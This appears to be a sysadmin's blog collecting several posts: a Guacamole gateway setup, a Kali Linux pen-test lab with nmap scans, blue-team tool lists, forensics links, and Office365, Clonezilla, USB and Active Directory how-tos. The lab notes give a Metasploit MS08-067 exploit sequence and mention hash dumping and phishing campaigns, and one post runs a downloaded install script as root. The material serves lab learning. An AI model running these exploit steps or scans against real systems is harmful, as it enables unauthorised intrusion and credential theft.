Setup Guacamole Remote Desktop Gateway on Ubuntu with one script

How to replace RDP, SSH and TeamViewer with free open source web-based client-less remote desktop gateway.

 

I recently learned about Guacamole and found that the setup is quite easy. I had been looking for a way to access all of my virtual and physical machine desktops remotely but didn’t want to rely upon, or trust TeamViewer eternally. Guacamole is open source software that provides you a way to run a tomcat/apache/mysql server suite that sets up and connects remote desktop connections via a web browser very similar to Teamviewer. It allows you to connect to any number of different desktops from anywhere with just an html5 web browser, and a single open port on your firewall that logs you into a console that has access to all your desktops, without having to install or configure remote clients such as putty, RDP and VPN.

The installation documentation on the official site is comprehensive but I was able to set up the system fast thanks to Chase Wright’s post here.

First, you’ll want a standard Ubuntu server or virtual machine installed and running. I installed guacamole on Ubuntu Server 16.10 LTS.

Second, open an ssh connection to your server and run the following commands:

sudo su -
wget https://raw.githubusercontent.com/MysticRyuujin/guac-install/master/guac-install.sh
chmod +x guac-install.sh
./guac-install.sh

The installation will take a little while to download and install, and should only prompt you to provide a mysql database password.

For me, that was pretty much it for the initial setup. Next, I went to a different computer and connected to the guacamole gateway at the following default website:

http://serverIPaddress:8080/guacamole (replace serverIPaddress with your ubuntu server’s IP)

Login with the default guacamole username/password: guacadmin/guacadmin

The initial interface is a little sparse, but to create an RDP connection do the following:

  1. Create a new user first before you create a connection because, by default, it will launch a desktop session the next time you log in. If there’s a problem with the connection you may get stuck. This happened to me and I was stuck on the error:
    “Connection Error: An internal error with Guacamole server, and the connection has been terminated”

    It took a little digging but essentially the server console is up and running, but it is hidden by the black screen/pop-up and you can get back into the settings by going to the url: http://serverIPaddress:8080/guacamole/#/settings/sessions

  2. Create the user first by going to the menu in the upper right-hand corner and choose Settings:
  3.  
  4. Next, click the Users tab and then New User:
  5. Next, provide a username, password (x2), and give this new user all permissions and hit save at the bottom:
  6. With this new user created, you will now want to log in as this new user and change the guacadmin account password.
  7. Now we can create our first connection. Before you create your first RDP connection, be sure to test RDP account credentials from a different computer to ensure you can connect successfully.
  8. Click on the Connections tab and then New Connection. The only things I had to set up to get to my workstation RDP connection working were the following:
  9.  
  10. Hit Save at the bottom. There are many additional settings available but this should get you up and connected.
  11. Now we want to assign this connection to a user. Do that by going into the Users tab again, find the user you want to assign and the connection:
  12. Now go to a different computer from the one you want to connect to, go to http://serverIPaddress:8080/guacamole site, login as the user with the connection assigned to it and you should be greeted with the RDP console of the remote computer.
  13. To setup an ssh connection it’s even easier. Again, first create a new user with the same name as the ssh server you want to connect into (I named my user HN-DHCP01). Then create a new connection and name it the same as your server. Below are the guacamole ssh connection settings I used to connect to my DHCP01 server:
  14. Under the Authentication setting, provide a valid ssh user’s credentials on the server you’ll be connecting into.
  15. Hit save at the bottom. Go back into the User tab, then select the new user (HN-DHCP01 user) and assign the connection to the user at the bottom and hit save.
  16. Log out of guacamole, then log in as the new user (HN-DHCP01) this will instantly log you into an ssh session that you can see in the screenshot below runs right in the browser!
  17. Guacamole also supports Two-Factor Authentication as well as a multitude of additional setups and configurations. It’s wise to setup 2FA prior to opening any firewall ports into your local network from the internet, as well as make sure that you follow all security precautions and test everything thoroughly.  Enjoy your guacamole and let me know in the comments if I’ve missed anything.

 

Installing Kali Linux on ProxMox – Building a Penetration Test Lab – Part 2

In the process of building a Penetration Test Lab, I wanted to get started with the installation of Kali Linux virtual machine running on ProxMox. To get started, first download the latest version of Kali Linux (ISO) here. Grab the version

Kali 64 bit ISO | Torrent 2.6G 2017.1

Build your new VM (Proxmox > Create VM) using the ISO you’ve downloaded.

According to other user’s accounts of Kali not working after installation, it’s recommended to change the display type to VMWare compatible: After building the VM, change Hardware > Display > Edit > Choose VMWare compatible:

Kali installs onto a virtual hard drive on ProxMox (we will not be running a “live” version of Kali.) Start the new VM and scroll down the menu and choose Install  – (not GUI install.)

During installation, when grub asks where to have grub installed, choose “select your own location.”
Manually enter the path: /dev/sda
Otherwise, if you choose the ‘default’ or the path already listed, after completing the installation and a restart, you’ll get a message “Booting from Hard Disk” and the boot sequence will not complete, the VM will essentially hang.

Kali has completed its setup, I’ve booted the Kali VM, I’ve logged in, and I’m on the desktop.

Run apt-get update and apt-get upgrade to update the packages on your system.

Before we go on to complete the setup of the rest of our lab with known-vulnerable hosts, let’s run some cursory nmap scans.

Let’s run a ping scan on our own network with the command:

nmap -v -sn 10.0.10.0/24

This says: nmap, print verbose output (-v), do a Ping Scan (-sn) – (disable the default port scan for each address), and use the network 10.0.10.0 with a CIDR of /24.

This scan will attempt to ping all 254 addresses. The highlights of the scan are below:

root@HN-kali01:~# nmap -v -sn 10.0.10.0/24

Starting Nmap 7.40 ( https://nmap.org ) at 2017-08-04 15:13 PDT
Initiating ARP Ping Scan at 15:13
Scanning 255 hosts [1 port/host]
Completed ARP Ping Scan at 15:13, 1.95s elapsed (255 total hosts)
Initiating Parallel DNS resolution of 255 hosts. at 15:13
Completed Parallel DNS resolution of 255 hosts. at 15:13, 5.53s elapsed
Nmap scan report for 10.0.10.0 [host down]
Nmap scan report for pfSense2x.jasoncoltrin.local (10.0.10.1)
Host is up (0.00048s latency).
MAC Address: 62:65:B1:30:52:A7 (Unknown)
Nmap scan report for 10.0.10.2 [host down]
Nmap scan report for 10.0.10.3 [host down]

...
...
Nmap scan report for 10.0.10.51
Host is up (0.00049s latency).
MAC Address: 18:03:73:34:34:36 (Dell)
Nmap scan report for 10.0.10.52 [host down]
Nmap scan report for 10.0.10.53 [host down]

So here we see that the scan detected my pfSense virtual machine firewall on IP 10.0.10.1, and gave me the MAC Address.

Let’s take a closer look at my the Dell workstation found on 10.0.10.51. To do so, let’s run a port scan:

nmap -p 1-65535 -sV -sS -T4 10.0.10.51

This scan does the following:

Run a full port scan on ports 1-65535, detect service versions, run a Stealth Syn scan, use T4 timing and the target of the scan is IP 10.0.10.51.

Below are the results:

root@HN-kali01:~# nmap -p 1-65535 -sV -sS -T4 10.0.10.51

Starting Nmap 7.40 ( https://nmap.org ) at 2017-08-04 15:17 PDT
Nmap scan report for 10.0.10.51
Host is up (0.00047s latency).
Not shown: 65528 filtered ports
PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
2179/tcp  open  vmrdp?
27036/tcp open  ssl/steam    Valve Steam In-Home Streaming service (TLSv1.2 PSK)
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
MAC Address: 18:03:73:34:34:36 (Dell)
Service Info: Host: JCDESKTOP; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 141.84 seconds

Because I don’t always like to use my new Kali VM via the ProxMox console, I want to run my Kali desktop over VNC & SSH. Here is a good resource for learning how to connect to your Kali Linux system with VNC over a secure SSH connection:

In the next post, we’ll look some more at NMAP, as well as some other pen-test tools.

Security – Blue Team – Building a security project on a budget

How to Create and Build a Security Profile for Your Network on a Budget – Part 1

Start with Building a Foundation (or use an existing good one).

Credit to Kyle Bubp & irongeek.com: http://www.irongeek.com/i.php?page=videos/bsidescleveland2017/bsides-cleveland-102-blue-teamin-on-a-budget-of-zero-kyle-bubp

Use a Base Framework for your security project. There are a lot of standards available and the NIST government standards are a good solid foundation:

  • NIST 800-53
  • NIST Cybersecurity Framework
  • NIST CSF Tool
  • CIS Critical Security Controls
  • NIST-CSF tool – this is a nice visual tool – graphical interface for the stages of building a security program

Document everything

A core documentation repository is critical when setting up a security project – others will follow you and will need to look up the information you have recorded. It’s best to have a security incident response ticketing system and documentation before you need it. Have these tools up and ready.

For policy, procedure, how-tos, etc:

  • MediaWiki(free)
  • Atlassian Confluence ($10 for 10 users) – glyfee plugin for confluence
  • OneNote/SharePoint – not every company is entirely open source

Incident Response Ticketing/Documentation systems:

Map out your entire network

  • NetDB – Uses ARP tables and MAC databases on your network gear. (use a service account and NetDB will use ssh/telnet to find every device connected, will give a nice http interface. You can setup a cron job that will scan NetDB database every hour. You can pipe new device connections to an email address. Knowing if something comes onto your network is critical.

.ova is available at https://www.kylebubp.com/files/netdb.ova

Supports the following: Cisco, Palo Alto, JunoOS, Aruba, Dell Powerconnect

  • nmap scans + ndiff/yandiff – not just for red teams; export results, diff for changes. Alert if something changed.
  • NetDisco

https://sourceforge.net/projects/netdisco – uses SNMP to inventory your network devices.

  • Map your network – create a Visio document and have a good network map.

Visibility

Facebook-developed osquery and this tool can give you all you need.

Agents for MacOS, Windows, Linux

Deploy across your enterprise w/ Chef, Puppet, or SCCM

Do fun things like search for IoC’s (FBI file hashes, processes) – pipe the data into ElasticStack for visibility & search-ability

User Data Discovery

OpenDLP – (github) or (download an .ova) – will scan file shares and using a normal user account you can scan for available shares and data. Run over the weekend and see what you can find. Find the data owners and determine where the data should reside.

Hardening Your Network

CIS Benchmarks – Center for Internet Security Benchmarks: 100+ configuration guidelines for various technology groups to safeguard systems against today’s evolving cyber threats.

Out of the box, windows 10 is 22% for the CIS benchmark.

It’s difficult to secure your network if everything is a snowflake. While not exciting, configuration management is important. Deploy configs across your org using tools like GPO, Chef, or Puppet.

Change management is also important – use git repo for trackign changes to your config scripts.

Safety vs. Risk

Scanning for Vulnerabilities:

OpenVAS (greenbone) is a fork of Nessus which is still maintained, is the default vulnerability scanner in AlienVault. It does a great job in comparison with commercial products. Be careful, do some safe scans first and it’s not recommended to scan critical life-support equipment for example in a hospital.

Scan web apps:

Arachni Framework – for finding bugs in your developer’s code

OWASP ZAP (Zed Attack Proxy)

Nikto2 (Server config scanner)

Portswigger Burp Suite (not free – $350)

Harden your web servers:

Fail2ban – python-based IPS that runs off of Apache Logs

ModSecurity – Open source WAF for Apache & IIS

 

 

 

Linux Digital Forensics Web Resources

Below is a list of digital forensics resources for linux. I especially enjoyed reading LUIS ROCHA‘s intro guide to Linux Forensics (#19).

  1. VirusTotal – Free Online Virus, Malware and URL Scanner
  2. TSK Tool Overview – SleuthKitWiki
  3. The Sleuth Kit
  4. Taking advantage of Ext3 journaling file system in a forensic investigation
  5. SANS Digital Forensics and Incident Response Blog – Understanding EXT4 (Part 1)- Extents – SANS Institute
  6. SANS Digital Forensics and Incident Response Blog – Understanding EXT4 (Part 2)- Timestamps – SANS Institute
  7. SANS Digital Forensics and Incident Response Blog – Understanding EXT4 (Part 3)- Extent Trees – SANS Institute
  8. SANS Digital Forensics and Incident Response Blog – Understanding EXT4 (Part 4)- Demolition Derby – SANS Institute
  9. SANS Digital Forensics and Incident Response Blog – Understanding EXT4 (Part 5)- Large Extents – SANS Institute
  10. SANS Digital Forensics and Incident Response Blog – How To – Digital Forensics Copying A VMware VMDK – SANS Institute
  11. SANS Digital Forensics and Incident Response Blog – Blog – SANS Institute
  12. qemu-img(1)- QEMU disk image utility – Linux man page
  13. qemu-img for WIndows – Cloudbase Solutions
  14. National Software Reference Library (NSRL) – NIST
  15. ltrace – Wikipedia
  16. Logical Volume Manager (204.3)
  17. Linux-Unix and Computer Security Resources – Hal Pomeranz – Deer Run Associates
  18. The Law Enforcement and Forensic Examiner’s Introduction to Linux
  19. Intro to Linux Forensics – Count Upon Security
  20. https—www.kernel.org-doc-Documentation-filesystems-ext4.txt
  21. GitHub – log2timeline-plaso- Super timeline all the things
  22. Filesystem Hierarchy Standard
  23. Digital Forensics – SuperTimeline & Event Logs – Part I – Count Upon Security
  24. Digital Forensics – NTFS Metadata Timeline Creation – Count Upon Security
  25. Digital Forensics – Evidence Acquisition and EWF Mounting – Count Upon Security
  26. chkrootkit — locally checks for signs of a rootkit

Building a penetration test lab – Part 1

Notes on how to create a Penetration Testing Lab

I’ve always had an interest in penetration testing and have messed around with nmap and nessus, but now I’m going to dig in my heels and become proficient using the tools in the pen-test theater. The following post is more of an outline of what is found in a youtube video I found here at Derbycon 2016. This speaker was inspiring as well as a few others who’ve spoken because they said that Sysadmins make good penetration testers. They mentioned that someone who is good at building systems and networks in general do well at breaking them down and actively locating and fixing problems in other systems. I am not looking to become a script kiddy, or a black hat/dark side cracker for that matter, but I do hope to become proficient with the tools they use, as well as work with python to build my own tools.

Since I last upgraded my vm server to proxmox, I’ve been kicking around ideas on how to use the hardware to it’s fullest potential. I’ve already gotten started by by first creating a new network on my proxmox host, and started up my first server in my segrated ‘insecure’ network by spinning up an isc-dhcp-server. I’ll probably post info on my build as I go along so stay tuned.

-Start of Video notes-

Credit: David Boyd
Pentest lab requirements:

  • Core i5 CPU
  • 16gb RAM
  • 250-500GB HDD
  • 7zip

VM software:

  • virtualbox
  • VMWare
  • Hyper-V
  • (I’ll be using) ProxMox

Pentesting platforms:

  • Kali Linux
  • Samurai WTF (WebAppTesting)
  • SamuraiSTFU(Utility Hacking)
  • Deft Linux (Forensics)

Old stuff:

  • olpix (?)
  • IWax(?)
  • backtrack (now Kali)

Offensive Security has – pre-compiled linux distro

Note: generate your own SSH keys

Now need something to attack…
Vulnerable VM’s:

  • Metasploitable 2 (Metasploit) – intentionally vulnerable Ubuntu has remote logins, backdoors, default pwds, vulnerable web services
  • Morning Catch (Phishing)
  • OWASP BrokenWebApplications (WebApps)
    WebGoat (Web Applications)
  • vulnhub.com (challengeVMs)
  • Kioptrix (Beginners)
  • PwnOS

Guides to pen expoits:
https://community.rapid7.com/docs/DOC-1875

Introducing Morning Catch
http://blog.cobaltstrike.com/2014/08/06/introducing-morning-catch-a-phishing-paradise/ – real working phishing lab

Sans Mutillidae Whitepaper
https://www.sans.org/reading-room/whitepapers/testing/introduction-owasp-mutillidae-ii-web-pen-test-training-environment-34380

VM’s to build and test:

Do not expose vulnerable vm’s to internet!
Make them hosts only (or in proxmox create a new bridge)

More tools:

  • nmap
  • nessus
  • cain (still works)
  • responder
  • john the ripper/hashcat
  • metasploit (freeversion works great)
  • SET/GoPhish/SPF (social engineering)
  • Discover Scripts – great stuff – great reconnisance
  • PowershellEmpire
  • CrackMapExec (post exploit)

How to Build a test domain controller, and add users with various privileges:
http://thehackerplaybook.com/windows-domain.htm

Once the virtual machines have been setup and set to ‘host only’
ping each vm

Initial testing and exploit example:

On Kali:
nmap 192.168.110.2 (XP)
nmap -O 192.168.110.2 (checks for OS)
msfconsole
msf> search ms08-067
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options
(shows mudule options)
msf exploit(ms08_067_netapi) > set RHOST 192.168.110.2
msf exploit(ms08_067_netapi) > exploit

kali:`# crackmapexec
(dumps hashes)

phishing server – load up goPhish – setup add users, make campaign

Additional training:
Metasploit unleashed
https://www.offensive-security.com/metasploit-unleashed

Hack This Site!
https://www.hackthissite.org/reading-room/whitepapers/testing/introduction-owasp-mutillidae-ii-web-pen-test-training-environment-34380
Youtube videos:
Derbycon, BSides, DefCon, ISSA

More information: Sans Cyber Aces, InfoSec Institute, Cybrary

It’s wise to find a mentor, as well as do some mentoring

Recommended reading (actual paper books):

  • The hacker playbook
  • Penetration Testing – a hands-on introduction to hacking – george wymann
  • Metasploit – The Penetration Tester’s Guide
  • Hacking – The art of exploitation Erickson
  • Professional Penetration Testing
  • The Art of Intrusion – kevin mitnick
  • The art of deception – kevin mitnick
  • Ghost in the wires – kevin mitnick
  • Black Hat Python – Jason Street

-End video notes-

Office365 Outlook Room Calendar not showing details – displays busy only – fix when Set-MailboxFolderPermission does not resolve

Solved: Office365 O365 Resources Rooms and & Equipment cannot view details or subject in shared calendar, can only see “Busy” and Set-MailboxFolderPermission did not fix or resolve.

So a room calendar would not display who reserved the room, and users requested that the calendars for room reservations display who reserved the room and the details. By default the event only displays “Busy”. Most posts I found online for this issue have the same resolution: use Set-MailboxFolderPermission to display details, comments, subject, and organizer. I did this and tried this using the identity in quotes as well as the full email address of the room, however the Set-MailboxFolderPermission setting did not work and the calendar would still only show “Busy”.

I was able to resolve the problem by looking at the rights of the users.

I found that the Calendar Access Rights for the User: “Default” only had {AvailabilityOnly}

To check permissions and fix this issue, first open PowerShell and connect to your O365 Exchange with the following commands:

$LiveCred = Get-Credential
$Session = New-PSSession -ConfigurationName Microsoft.Exchange-ConnectionUri https://ps.outlook.com/powershell/ -Credential $LiveCred -Authentication Basic -AllowRedirection
Import-PSSession $Session

Once connected, first check that the default user has the correct AccessRights and permissions to work with the calendar. As you can see below here, the Default user has {AvailabilityOnly} permissions when issuing the following command:

Get-MailboxFolderPermission roomname@domain.com:\Calendar
PS C:\admin> Get-MailboxFolderPermission roomname@domain.com:\Calendar

FolderName           User                 AccessRights
----------           ----                 ------------
Calendar             Default              {AvailabilityOnly}
Calendar             Anonymous            {None}

I changed the AccessRights from {AvailabilityOnly} to {PublishingAuthor} with the following command:

Set-MailboxFolderPermission -Identity "roomname@domain.com:\Calendar" -User default -AccessRights PublishingAuthor

And then ensured the identity has the correct CalendarProcessing switches with this command:

Set-CalendarProcessing -Identity "roomname@domain.com" -AddOrganizerToSubject $true -DeleteComments $false -DeleteSubject $false

Now the event’s details and subject can be viewed by everyone. This change takes place pretty quickly, within a minute – the “Busy” events should change to display the details when you close/open Outlook and/or switch between the calendars in Outlook online. Hope this saves someone else a call to MS Support.

SmarterMail Enterprise 15.5 – Export / Import iCalendar/Outlook calendar into SmartMail

How to import iCalendar events into SmartMail / SmarterMail Enterprise IMAP calendar

So one of my clients have a team that have been using iCalendar to share calendars, but have decided to migrate to SmarterMail Enterprise 15.5 IMAP/Exchange for their team calendar sharing. While there is no direct way to import iCalendar events into SmartMail directly, there is a two-step approach that works pretty well.

In this case, the clients only want to migrate historical data and not current/future events. It sounds harder than it is, but the migrations shouldn’t take long and with minimal effort. If you don’t have spare gmail accounts to use then you may want to create new gmail accounts just for this purpose, or delete all calendar events in an existing google calendar between migrations.

One thing that I did notice is that reoccurring appointments will be transferred over and this may in turn create duplicates if you already have appointments in SmartMail that are reoccurring. It may be wise to remove reoccurring appointments from the source calendar prior to doing the first export.

As always it’s best to first backup your data prior to doing anything, then run a few tests to make sure that all calendar events, items, and attachments transfer successfully during the migration.

But in our test case, the Outlook (icalendar) – to – GMAIL – to – SmartMail works perfectly fine.

First go to Outlook > File menu > Open & Export > Import/Export > Select your iCalendar (and any other calendars you’d like to export):

Export to .CSV > Calendar (here you can select date range of events to be exported) > save to something like c:\Users\jcoltrin\Desktop\jasoncalendar.csv

Then

Login to any Google account/Gmail > Calendar > Gear Icon > Settings > Calendars > Import calendar > choose jasoncalendar.csv (import successful.)

Calendar items display in my google calendar:

Then now that the calendar items are in my google calendar, I went into smartmail account  > settings > Advanced Settings > Mailbox Migration > Account type: GMAIL > next > Check “Calendar” > do the Google authentication (which works well and uses Google’s authentication). >  Import

Now the same calendar items are in my Smartmail Calendar.

Clonezilla – identify original disk size of clone .img image by looking at flat files

How to find the original HDD hard drive disk size in a Clonezilla img image file

So if you’re a fan of Clonezilla like I am, you may have a library of .img images in a file share somewhere. I find that when taking an image of a system, it’s best to name the image/file with something descriptive such as (Win7-64-Optiplex7040-500GB-Date-img). But what happens if you want to restore data from an image onto a new hard drive, but you can’t remember, or didn’t write down the size of the disk that it originally was imaged from? As you may already know, Clonezilla doesn’t like to be restored onto disks smaller than the original disk on which it originated. There are some advanced options when saving a Disk-to-image in clonezilla, or Image-to-Disk, however I haven’t found a reliable way to restore an image to a smaller disk drive.

In the event you have an old image, but you’re not sure what size disk it came from originally, and you didn’t name your file with the original disk size, there is a way how to find the original disk size using the flat files that clonezilla creates when taking the image.  To do this, go into the img folder, look for a file named sda-pt.parted.compact and open it with a text editor such as NotePad++.

This file will contain everything you need to know to determine the original size of a HDD that existed in the computer before you took the copy of the clone. For example, here is the contents of the file highlighted above:

Model: ATA WDC WD2500AAJS-7 (scsi)
Disk /dev/sda: 250GB
Sector size (logical/physical): 512B/512B
Partition Table: msdos
Disk Flags: 

Number  Start   End    Size   Type     File system  Flags
 1      1049kB  106MB  105MB  primary  ntfs         boot
 2      106MB   250GB  250GB  primary  ntfs

As you can see we get a Model number, Manufacturer, disk size, partition sizes and file-system type.

I haven’t had trouble restoring Clonezilla images to different manufacturers of hard drives as long as the new drive is larger than the original drive. Also, I find that it’s invaluable to have at least a gigabit connection between the machine you’re trying to clone and the file share where you’re saving the img file.

 

 

 

Test USB 3.0 and USB 2.0 thumb flash drive on Windows 10 read write speeds

How to test USB thumb drives for USB 3.0, USB 2.0, and test Read and Write Speeds on Windows 10

Determine if USB Port is 2.0 or 3.0 in Windows 10:

Below are some directions and screenshots of how you can tell if a USB drive is connected to Windows 10 with USB 3.0 or USB 2.0., first insert the drive into a USB port on your Windows 10 computer.

Click on the Start Button > then click on the Settings gear icon > in the “Find a Setting” box > type “Connected Devices” > then click on the “Connected Device Settings” icon. The USB 3.0 will show “Connected to USB 3.0”, the USB 2.0 drives will not display these words:

Testing Read and Write speeds of USB 2.0 and USB 3.0 with SpeedOut utility and  Windows 10.

I picked up a couple thumb drives this weekend that were on sale at Frys. I like to have both USB 2.0 and USB 3.0 drives on hand in case a computer doesn’t recognize USB 3.0 as a boot drive. I wanted to determine the Read and Write speeds of my USB drives to test if they actually display a difference according to their listed specs (spoiler alert: numbers can be deceiving.) My PC workstation has an Intel SSD drive and USB 3.0 ports.  I downloaded and ran the SpeedOut v0.5 utility against 4 different USB thumb drives:

  1. Patriot Memory Flash PSF32GBLZ3USB 32GB USB3.0 BLITZ with a yellow plastic case.
  2. Hyundai USB 2.0 Bravo 16GB with a metal case.
  3. Kingston USB 2.0 DTS E9 Data Traveller 16GB with a metal case.
  4. SanDisk Ultra USB 3.0 32GB SDCZ48-032G with a plastic case.

All four drives were formatted FAT32 (and I tested the Patriot drive as NTFS.) The way you know if a device is connected to 3.0 USB in windows 10: Start > Settings > Search “Find a setting” : type in “devices” > Show all results > Connected Device Settings > Other devices > Find your USB drive and it should say “Connected to USB 3.0”. More details on where to find this setting at the bottom of the article.

Anyway, I ran SpeedOut utility against the Patriot USB 3.0 drive first, and the results were: 23.7 MB/s READ and 27.8 MB/s.

I ran the same SpeedOut test against on the same USB port using a HYUNDAI USB 2.0 BRAVO 16GB drive (wasn’t recognized as USB3.0 by Windows 10) and it’s results were: 21.9 READ and 10.5 WRITE.

Then I ran the same SpeedOut test again using a Kingston DTS E9 Data Traveler and it’s results were 17.158 READ and 9.8 MB/s WRITE.

Lastly I ran the same SpeedOut test again using a SanDisk Ultra USB 3.0 32GB drive and the results were: 128.04 MB/s READ and 52.47 MB/s WRITE.

I gave the Patriot USB 3.0 drive another chance the results of a 2nd read write test against the drive were pretty good:

This test gave me hope that the drive would have decent write speeds but upon testing the copy of an ubuntu-16.10-server-amd64.iso (684.032 MB) file from my SSD drive to the Patriot USB 3.0 Drive, the results show surprisingly slow speeds after an initial burst of speed:

I thought perhaps this may have to do with the drive formatted as Fat32, so I formatted the drive as NTFS and tried again. Here is the SpeedOut result first:

Now the same Ubuntu.iso copy and it’s results:

Same results. The write speed would alternate between 6.24 MB/s and 12 MB/s which is in all reality pretty abysmal for a USB 3.0 drive! The total copy time for the 684MB file was 55.12 seconds…

The total copy time for the HYUNDAI USB drive for the same ubuntu .iso was 1:10.02 seconds.

The USB Patriot USB 3.0 drive did not fare much better than the Hyundai USB 2.0 drive, but I did notice that there is an initial speed burst when copying data to the Patriot drive. To test this I copied a 100MB file to the Patriot drive and while the first copy of the 94MB file did quickly finish at around 60 MB/s, however subsequent tests were very low again in the 6-12MB/sec range. The Patriot drive is no other way to describe than flaky; fast sometimes for a little while, but ultimately pretty slow – just a little better than the USB 2.0 drives.

Lastly I tested the copy speed of the same Ubuntu .iso file to the SanDisk Ultra 3.0 32 GB drive formatted Fat32 and the amount of time to copy was  14.59 seconds!

Just because something says USB 3.0 and is on sale, doesn’t mean you’re going to get true USB 3.0 speeds reliably…

 

New Active Directory User and Office365 New User Powershell Procedure

As a systems administrator, quite often you’ll need to create new user accounts in Active Directory and MSOnline Office 365. It’s good to streamline your new user creation procedure as much as possible to make the process faster and more accurate. Thanks to PowerShell, we can turn a whole bunch of point and clicks into just a few PowerShell commands. In this example procedure we will first create an Active Directory AD user account with powershell and a .csv file and then add that user into multiple groups with a different powershell script and a .txt file that has a list of the groups. We will also use another powershell script to get the canonical name of the groups so that our script can find the LDAP location of the group in Active Directory. Secondly, because we do not run our own exchange server we will use powershell to connect to Office365, and create a new user there, license the user, and then add the user to some distribution groups. Prerequisites are powershell, and import AD components and MSOnline components.

 

  1. Go to https://gallery.technet.microsoft.com/scriptcenter/PowerShell-Create-Active-7e6a3978 and download the create_ad_users.zip and extract to c:\newusers\
  2. Edit create_ad_users.ps1 lines 92 and 98 to accommodate longer last names. In the original script it only allows for first initial and then a truncated last name of 4 characters. In my case, we have some users with long last names, so I set those values to 20:
  3. If($replace.length -lt 20)
    {
      $lastname = $replace
    }
    Else
    {
      $lastname = $replace.substring(0,20)
    }
    

     

  4. Copy info from your HR department about the new user into the .csv file c:\newusers\import_create_ad_users.csv
  5. Run PS C:\newusers> .\create_ad_users.ps1
  6. Next check the new username in ADUC for such things as account name, address, phone number etc. to ensure the entries are accurate.
  7. With our new user account created, most likely we will want to make that user a member of several security groups. To do that with PowerShell, we need to make sure that we have the correct LDAP names for our groups and place them into a file named groups.txt. In order to do so, we need to run another powershell script named find-dn.ps1 . The code is as follows:
    # Function Find Distinguished Name
    function find-dn { param([string]$adfindtype, [string]$cName)
        # Create A New ADSI Call
        $root = [ADSI]''
        # Create a New DirectorySearcher Object
        $searcher = new-object System.DirectoryServices.DirectorySearcher($root)
        # Set the filter to search for a specific CNAME
        $searcher.filter = "(&(objectClass=$adfindtype) (CN=$cName))"
        # Set results in $adfind variable
        $adfind = $searcher.findall()
        
        # If Search has Multiple Answers 
        if ($adfind.count -gt 1) {
            $count = 0 
            foreach($i in $adfind)
            {
                # Write Answers On Screen
                write-host $count ": " $i.path
                $count += 1
            }
            # Prompt User For Selection
            $selection = Read-Host "Please select item: "
            # Return the Selection
            return $adfind[$selection].path
        }
        # Return The Answer
        return $adfind[0].path
    }

    This code should be inserted into a new PowerShell ISE tab and then saved as find-dn.ps1 . Running the code will produce a new PowerShell function (but will not write any output to the screen.) Find the group names in ADUC that you want the CN name for, and then use the following command(s) to return the CN name:

    find-dn "group" "FinanceGroup"

    The script will return something similar to the following:

    LDAP://CN=FinanceGroup,CN=Users,DC=intranet,DC=contoso,DC=com

    Remove the part “LDAP://” and copy the remaining string into the c:\newusers\groups.txt file, which after finding the rest of your group CN names, should look something similar to the following:

    CN=FinanceGroup,CN=Users,DC=intranet,DC=contoso,DC=com
    CN=HRGroup,CN=Users,DC=intranet,DC=contoso,DC=com
    CN=OperationsGroup,CN=Users,DC=intranet,DC=contoso,DC=com
    CN=ITGroup,CN=Users,DC=intranet,DC=contoso,DC=com
    CN=AccountingGroup,CN=Users,DC=intranet,DC=contoso,DC=com
    CN=ComplianceGroup,CN=Users,DC=intranet,DC=contoso,DC=com
    CN=MarketingGroup,CN=Users,DC=intranet,DC=contoso,DC=com

     

  8. Now that we have our CN security group names, we can add the user(s) into the groups with the following script. For this step we can utilize the script found here: https://community.spiceworks.com/topic/459481-adding-users-to-multiple-security-groups-in-ad – which was contributed by Martin9700 . Copy the following script into a new PowerShell ISE tab and name the file Add-MultipleGroups.ps1 :
    #requires -Version 3.0
    Param (
        [Parameter(Mandatory,ValueFromPipeline)]
        [String[]]$Groups,
        [Parameter(Mandatory)]
        [String[]]$Users,
        [switch]$Passthru
    )
    
    Begin {
        Try { Import-Module ActiveDirectory -ErrorAction Stop }
        Catch { Write-Error "Unable to load Active Directory module, is RSAT installed?"; Exit }
        $Result = @()
    }
    
    Process {
        ForEach ($Group in $Groups)
        {   Try {
                Add-ADGroupMember $Group -Members $Users -ErrorAction Stop
                $Result += [PSCustomObject]@{
                    Group = $Group
                    AddMembers = $Users -join ", "
                }
            }
            Catch {
                Write-Error "Error adding members to $Group because $($Error[0])"
                $Result += [PSCustomObject]@{
                    Group = $Group
                    AddMembers = $Error[0]
                }
            }
        }
    }
    
    End {
        If ($Passthru)
        {   $Result
        }
    }

     

  9. Run the following command to add user to the appropriate security groups:
PS C:\newusers> .\Add-MultipleGroups.ps1 -Groups "CN=ITGroup,CN=Users,DC=intranet,DC=contoso,DC=com","CN=OperationsGroup,CN=Users,DC=intranet,DC=contoso,DC=com" -users user1, user2

With the above script you can use the file to run a number of different options as well such as:

You can just put the group names in -Groups:

.\Add-MultipleGroups.ps1 -Groups "testgroup1","testgroup2" -users user1,user2,user3,user4

You can use a text file (either in Groups or via pipeline):

.\Add-MultipleGroups.ps1 -Groups (Get-content c:\groups.txt) -users user1,user2,user3,user4

Get-content c:\groups.txt | .\Add-MultipleGroups.ps1 -Groups -users user1,user2,user3,user4

You can also use Get-Content for users, but you can pipe it:

Get-content c:\groups.txt | .\Add-MultipleGroups.ps1 -Groups -users (Get-content c:\users.txt)

 

You can confirm in ADUC that the users are now members of the security groups in our groups.txt file.

Add users to Office 365 and Distribution Groups with PowerShell

Great! Now that we have our user accounts created on the AD side of things, we will move on to adding our user(s) into Office365:

With PowerShell up and running will will issue the following commands:

From https://www.petri.com/use-powershell-create-assign-licenses-office-365-users

Import-Module MSOnline

Connect-MsolService

Now we will create the user with the following command:

New-MsolUser -UserPrincipalName user1@contoso.com -DisplayName ‘User 1’ -FirstName User -LastName 1

This command will return something like the following (sorry about the formatting:)

 

PS C:\Users\jcoltrin> New-MsolUser -UserPrincipalName user1@planmember.com -DisplayName ‘User 1’ -FirstName User -LastName 1



Password                                   UserPrincipalName                          DisplayName                                isLicensed

--------                                   -----------------                          -----------                                ----------

Suso4007                                   user1@contoso.com                       User 1                                False

 

